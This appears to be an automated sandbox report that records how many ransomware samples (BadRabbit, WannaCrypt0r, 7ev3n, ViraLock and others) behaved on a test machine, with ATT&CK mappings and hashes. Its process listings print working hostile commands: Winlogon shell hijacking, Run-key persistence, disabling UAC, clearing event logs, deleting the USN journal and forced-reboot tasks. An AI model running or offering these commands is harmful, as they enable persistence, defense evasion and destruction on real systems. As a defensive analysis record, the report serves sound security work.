- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{dacfef6a-e2e8-584e-831f-6fc470064105}\trufos.inf" "9" "44fa39f97" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{b233fcce-da23-7045-aeb1-bf42baeed530}\vlflt.inf" "9" "416afd99f" "0000000000000164" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "5" "2" "C:\Windows\System32\DriverStore\FileRepository\vlflt.inf_amd64_a5d44f8847918155\vlflt.inf" "0" "4129e6957" "000000000000017C" "WinSta0\Default"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "5" "2" "C:\Windows\System32\DriverStore\FileRepository\trufos.inf_amd64_e19961ad0f1621a3\trufos.inf" "0" "46be853c7" "0000000000000180" "WinSta0\Default"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -imon1 "-anf=C:\Users\Admin\AppData\Local\Temp\Rar$LS968.32088" -scul -- "C:\Users\Admin\Desktop\7ev3n.zip" C:\Users\Admin\Desktop\1⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe95074f50,0x7ffe95074f60,0x7ffe95074f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1608 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2420 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4728 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1.5 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,12130133855670744363,15732033767324171615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5640 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -imon1 "-anf=C:\Users\Admin\AppData\Local\Temp\Rar$LS968.46569" -scul -- "C:\Users\Admin\Desktop\DeriaLock.zip" C:\Users\Admin\Desktop\1⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"C:\Users\Admin\Desktop\Endermanch@7ev3n.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat3⤵
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Modifies WinLogon for persistence
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵
- Adds Run key to start application
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵
- UAC bypass
-
C:\Users\Admin\Desktop\Endermanch@BadRabbit.exe"C:\Users\Admin\Desktop\Endermanch@BadRabbit.exe"1⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 152⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2811355712 && exit"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:47:003⤵
-
C:\Windows\6402.tmp"C:\Windows\6402.tmp" \\.\pipe\{7C79FA16-2FE9-4E6F-8092-B6429690269A}3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:3⤵
-
C:\Users\Admin\Desktop\Endermanch@Cerber5.exe"C:\Users\Admin\Desktop\Endermanch@Cerber5.exe"1⤵
- Executes dropped EXE
- Enumerates connected drives
-
C:\Users\Admin\Desktop\Endermanch@Birele.exe"C:\Users\Admin\Desktop\Endermanch@Birele.exe"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
-
C:\Users\Admin\Desktop\Endermanch@DeriaLock.exe"C:\Users\Admin\Desktop\Endermanch@DeriaLock.exe"1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@Petya.A.exe"C:\Users\Admin\Desktop\Endermanch@Petya.A.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\Endermanch@NoMoreRansom.exe"C:\Users\Admin\Desktop\Endermanch@NoMoreRansom.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\Endermanch@Krotten.exe"C:\Users\Admin\Desktop\Endermanch@Krotten.exe"1⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Users\Admin\Desktop\Endermanch@ViraLock.exe"C:\Users\Admin\Desktop\Endermanch@ViraLock.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\yyosEMIQ\rmAkUQYk.exe"C:\ProgramData\yyosEMIQ\rmAkUQYk.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ioYswEoQ.bat" "C:\Users\Admin\Desktop\Endermanch@ViraLock.exe""2⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Endermanch@ViraLock"2⤵
-
C:\Users\Admin\Desktop\Fantom.exe"C:\Users\Admin\Desktop\Fantom.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@Xyeta.exe"C:\Users\Admin\Desktop\Endermanch@Xyeta.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 4482⤵
- Program crash
-
C:\Users\Admin\Desktop\Endermanch@WinlockerVB6Blacksod.exe"C:\Users\Admin\Desktop\Endermanch@WinlockerVB6Blacksod.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\sys3.exeC:\Users\Admin\AppData\Local\Temp\\sys3.exe1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\Endermanch@WannaCrypt0r.exe"C:\Users\Admin\Desktop\Endermanch@WannaCrypt0r.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
-
C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"C:\Users\Admin\Desktop\Endermanch@PowerPoint.exe"1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe"C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vAYggkIA.bat" "C:\Users\Admin\Desktop\Endermanch@PolyRansom.exe""2⤵
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp/file.vbs3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 22⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 12⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\Desktop\Endermanch@PolyRansom"2⤵
-
C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"C:\Users\Admin\Desktop\Endermanch@InfinityCrypt.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38e2055 /state1:0x41c64e6d1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c schtasks /Delete /F /TN rhaegal1⤵
-
C:\Users\Admin\Desktop\Endermanch@PolyRansom.exeC:\Users\Admin\Desktop\Endermanch@PolyRansom1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2324 -ip 23241⤵
-
C:\Users\Admin\Desktop\Endermanch@ViraLock.exeC:\Users\Admin\Desktop\Endermanch@ViraLock1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\system.exeC:\Users\Admin\AppData\Local\system.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:642⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Winlogon Helper DLL
2Change Default File Association
1Registry Run Keys / Startup Folder
3Bootkit
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Modify Registry
11Bypass User Account Control
1Disabling Security Tools
1File Permissions Modification
1Install Root Certificate
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exeFilesize
250KB
MD500c8768fd6ab655475ec9c9015326587
SHA1410e9743ee86b081a46cf053d915660b51b4aab7
SHA25602312183b0d767fb2a4072d06e655086a64844fe97ed4177ae16ec8d5c76aded
SHA5129aab7aaea306af9fd895fca7b9670c272a88fa207720335863f8036f133e00ea13d4377f7552553cfa34aafc1c03cde68855518db5afda4a43fc7bc1a821a0e2
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exeFilesize
250KB
MD500c8768fd6ab655475ec9c9015326587
SHA1410e9743ee86b081a46cf053d915660b51b4aab7
SHA25602312183b0d767fb2a4072d06e655086a64844fe97ed4177ae16ec8d5c76aded
SHA5129aab7aaea306af9fd895fca7b9670c272a88fa207720335863f8036f133e00ea13d4377f7552553cfa34aafc1c03cde68855518db5afda4a43fc7bc1a821a0e2
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exeFilesize
703KB
MD56ac1f918386979e9cb90eeb47593be98
SHA1118fa84784338d80dd76f787462f006379e1107a
SHA256e9cd0131d7c50116522c1636345ff3eb6e29727e15b6e901ffffc616fa90d595
SHA512d5632b20377e6fc32f064f633d0bb1120d0599a074a60aa6f65f77bdc06f8a27013d8e94c7f67313e4f4b88ef4f59f313cade7266c2257e2b16120f88d907a11
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exeFilesize
703KB
MD56ac1f918386979e9cb90eeb47593be98
SHA1118fa84784338d80dd76f787462f006379e1107a
SHA256e9cd0131d7c50116522c1636345ff3eb6e29727e15b6e901ffffc616fa90d595
SHA512d5632b20377e6fc32f064f633d0bb1120d0599a074a60aa6f65f77bdc06f8a27013d8e94c7f67313e4f4b88ef4f59f313cade7266c2257e2b16120f88d907a11
-
C:\Users\Admin\Downloads\bitdefender_tsecurity.exeFilesize
13.4MB
MD5f280ff3f1f817c57385bc802d7cc5017
SHA14844beeb29856ac964cf925eaf457197b9943fe1
SHA256f65766b8157c3b2b24872647585cbf1bcf3e66af5adf360902c16ef7b2e45bd0
SHA5122fd2294c8bb707bb2331bb7e0a8b61766f17fe880f321f209f3c4c5220c66e8628ddc483ba745a9a10361c136a22ca3875856e63c3e70006d2dcdecb117263ad
-
C:\Users\Admin\Downloads\bitdefender_tsecurity.exeFilesize
13.4MB
MD5f280ff3f1f817c57385bc802d7cc5017
SHA14844beeb29856ac964cf925eaf457197b9943fe1
SHA256f65766b8157c3b2b24872647585cbf1bcf3e66af5adf360902c16ef7b2e45bd0
SHA5122fd2294c8bb707bb2331bb7e0a8b61766f17fe880f321f209f3c4c5220c66e8628ddc483ba745a9a10361c136a22ca3875856e63c3e70006d2dcdecb117263ad
-
\??\pipe\crashpad_1160_AOBRWQEKOUCMATVUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/180-224-0x0000000000000000-mapping.dmp
-
memory/232-226-0x000000002AA00000-0x000000002AA24000-memory.dmpFilesize
144KB
-
memory/436-244-0x0000000000000000-mapping.dmp
-
memory/644-256-0x00000000058F0000-0x0000000005946000-memory.dmpFilesize
344KB
-
memory/644-230-0x0000000000E90000-0x0000000000ECC000-memory.dmpFilesize
240KB
-
memory/644-238-0x0000000005D90000-0x0000000006334000-memory.dmpFilesize
5.6MB
-
memory/716-182-0x0000000000000000-mapping.dmp
-
memory/720-168-0x0000000000000000-mapping.dmp
-
memory/752-173-0x0000000000000000-mapping.dmp
-
memory/820-240-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/820-260-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1000-217-0x0000000000000000-mapping.dmp
-
memory/1020-180-0x000000006EDD0000-0x000000006EDE0000-memory.dmpFilesize
64KB
-
memory/1020-179-0x0000000000000000-mapping.dmp
-
memory/1112-218-0x0000000000000000-mapping.dmp
-
memory/1188-210-0x0000000000000000-mapping.dmp
-
memory/1228-160-0x0000000000000000-mapping.dmp
-
memory/1240-202-0x0000000000000000-mapping.dmp
-
memory/1256-227-0x0000000000000000-mapping.dmp
-
memory/1256-265-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB
-
memory/1432-251-0x00000000050E0000-0x00000000050EA000-memory.dmpFilesize
40KB
-
memory/1656-189-0x0000000000000000-mapping.dmp
-
memory/1744-204-0x0000000000000000-mapping.dmp
-
memory/1928-245-0x0000000010000000-0x0000000010010000-memory.dmpFilesize
64KB
-
memory/2068-225-0x0000000000400000-0x00000000005DE000-memory.dmpFilesize
1.9MB
-
memory/2068-233-0x0000000000700000-0x00000000007CE000-memory.dmpFilesize
824KB
-
memory/2068-246-0x0000000000400000-0x00000000005DE000-memory.dmpFilesize
1.9MB
-
memory/2120-235-0x0000000000000000-mapping.dmp
-
memory/2304-253-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/2304-250-0x0000000003D50000-0x0000000003D81000-memory.dmpFilesize
196KB
-
memory/2304-266-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2324-258-0x0000000000480000-0x0000000000483000-memory.dmpFilesize
12KB
-
memory/2324-255-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB
-
memory/2380-132-0x00000204A6EA0000-0x00000204A6EE6000-memory.dmpFilesize
280KB
-
memory/2380-134-0x00000204C14E0000-0x00000204C14E8000-memory.dmpFilesize
32KB
-
memory/2380-135-0x00000204C7E50000-0x00000204C7E88000-memory.dmpFilesize
224KB
-
memory/2380-133-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmpFilesize
10.8MB
-
memory/2380-136-0x00000204C1510000-0x00000204C151E000-memory.dmpFilesize
56KB
-
memory/2380-140-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmpFilesize
10.8MB
-
memory/2380-141-0x00007FFE996B0000-0x00007FFE9A171000-memory.dmpFilesize
10.8MB
-
memory/2400-138-0x0000000000000000-mapping.dmp
-
memory/2424-169-0x0000000000000000-mapping.dmp
-
memory/2480-194-0x0000000000000000-mapping.dmp
-
memory/2480-176-0x0000000000000000-mapping.dmp
-
memory/2480-177-0x000000006EDD0000-0x000000006EDE0000-memory.dmpFilesize
64KB
-
memory/2516-167-0x000000006EDD0000-0x000000006EDE0000-memory.dmpFilesize
64KB
-
memory/2516-166-0x0000000000000000-mapping.dmp
-
memory/2580-213-0x0000000000000000-mapping.dmp
-
memory/2608-248-0x0000000000000000-mapping.dmp
-
memory/2672-214-0x0000000000000000-mapping.dmp
-
memory/2684-219-0x0000000000000000-mapping.dmp
-
memory/2716-200-0x0000000000000000-mapping.dmp
-
memory/2752-157-0x0000000000000000-mapping.dmp
-
memory/2868-228-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2868-231-0x0000000000540000-0x0000000000546000-memory.dmpFilesize
24KB
-
memory/2868-262-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2868-222-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3040-209-0x0000000000000000-mapping.dmp
-
memory/3040-163-0x0000000000000000-mapping.dmp
-
memory/3124-197-0x0000000000000000-mapping.dmp
-
memory/3208-205-0x0000000000000000-mapping.dmp
-
memory/3332-243-0x0000000000000000-mapping.dmp
-
memory/3396-208-0x0000000000000000-mapping.dmp
-
memory/3488-150-0x0000000000000000-mapping.dmp
-
memory/3496-241-0x0000000004EB0000-0x0000000004F42000-memory.dmpFilesize
584KB
-
memory/3496-229-0x0000000000490000-0x0000000000512000-memory.dmpFilesize
520KB
-
memory/3496-232-0x0000000004D50000-0x0000000004DEC000-memory.dmpFilesize
624KB
-
memory/3504-187-0x0000000000000000-mapping.dmp
-
memory/3504-188-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmpFilesize
760KB
-
memory/3608-236-0x0000000000000000-mapping.dmp
-
memory/3708-195-0x0000000000000000-mapping.dmp
-
memory/3712-212-0x0000000000000000-mapping.dmp
-
memory/3728-237-0x0000000000400000-0x0000000000439000-memory.dmpFilesize
228KB
-
memory/3728-259-0x0000000000400000-0x0000000000439000-memory.dmpFilesize
228KB
-
memory/3728-154-0x0000000000000000-mapping.dmp
-
memory/3752-247-0x0000000000000000-mapping.dmp
-
memory/3776-268-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/3776-234-0x0000000000000000-mapping.dmp
-
memory/3892-211-0x0000000000000000-mapping.dmp
-
memory/3972-196-0x0000000000000000-mapping.dmp
-
memory/4016-146-0x0000000000000000-mapping.dmp
-
memory/4168-152-0x0000000000000000-mapping.dmp
-
